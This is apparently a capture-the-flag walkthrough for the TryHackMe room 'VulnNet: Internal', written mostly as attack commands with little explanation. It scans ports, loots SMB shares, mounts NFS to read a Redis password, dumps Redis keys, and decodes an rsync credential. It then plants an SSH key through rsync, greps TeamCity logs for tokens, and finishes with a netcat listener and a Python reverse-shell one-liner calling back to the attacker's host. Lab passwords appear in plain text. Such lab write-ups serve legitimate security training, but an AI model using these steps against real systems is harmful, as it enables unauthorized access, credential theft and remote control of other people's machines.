VulnNet: Internal
Room Link: https://tryhackme.com/room/vulnnetinternal
Initial Scan
Kali
nmap -A $VICTIM


Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/139 - NetBIOS
nbtscan $VICTIM

TCP/445 - SMB
In SMB there is the first flag.
Kali
smbget -R smb://$VICTIM/shares
smbclient \\\\$VICTIM\\shares
smb: \> cd temp
smb: \temp\> get services.txt
smb: \temp\> cd ..
smb: \> cd data
smb: \data\> get data.txt
smb: \data\> get business-req.txt

TCP/2049 - NFS
Kali
showmount -e $VICTIM
mkdir /mnt/nfs
mount $VICTIM:/opt/conf /mnt/nfs
cd /mnt/nfs
cat redis/redis.conf

TCP/6379 - Redis

Kali
redis-cli -h $VICTIM -a "B65Hx562F@ggAZ@F"
10.10.232.200:6379> KEYS *
10.10.232.200:6379> KEYS "internal flag"
10.10.232.200:6379> GET "internal flag"

Kali
KEYS "authlist"
LRANGE authlist 1 100

Kali
echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d

TCP/873 - RSYNC
We are able to transfer out key to allow us to login to as the sys-internal user.
Kali
rsync --list-only rsync://$VICTIM
rsync --list-only rsync://rsync-connect@$VICTIM/files
Password: Hcg3HP67@TW@Bc72v
ssh-keygen -t rsa
cp ~/.ssh/id_rsa.pub authorized_keys
rsync authorized_keys rsync://rsync-connect@$VICTIM/files/sys-internal/.ssh
Password: Hcg3HP67@TW@Bc72v
TCP/22 - SSH
Kali
ssh sys-internal@$VICTIM
Victim
ss -ltp

Kali
ssh -D 9050 sys-internal@$VICTIM


Add the token in the Authentication token. There was multiple listed, it was the last one
Victim
grep -iR token /TeamCity/logs/ 2>/dev/null







Kali
nc -lvnp 1337
Custom script
export RHOST="$KALI";export RPORT=1337;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'



Last updated